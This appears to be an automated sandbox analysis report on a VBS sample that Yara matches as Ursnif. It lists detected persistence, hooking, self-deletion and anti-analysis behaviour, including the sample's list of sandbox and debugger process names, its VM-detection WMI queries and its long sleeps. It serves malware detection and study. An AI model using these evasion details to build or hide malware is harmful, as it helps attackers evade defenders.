Source: C:\Windows\System32\control.exe Code function: 32_2_00C9C6E9 push 3B000001h; retf 32_2_00C9C6EE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1A0A LoadLibraryA,GetProcAddress, 21_2_6FBB1A0A
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\presentation[2021.09.09_15-26].vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1015558083.000001BA1E067000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 2944 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3833 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4955 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
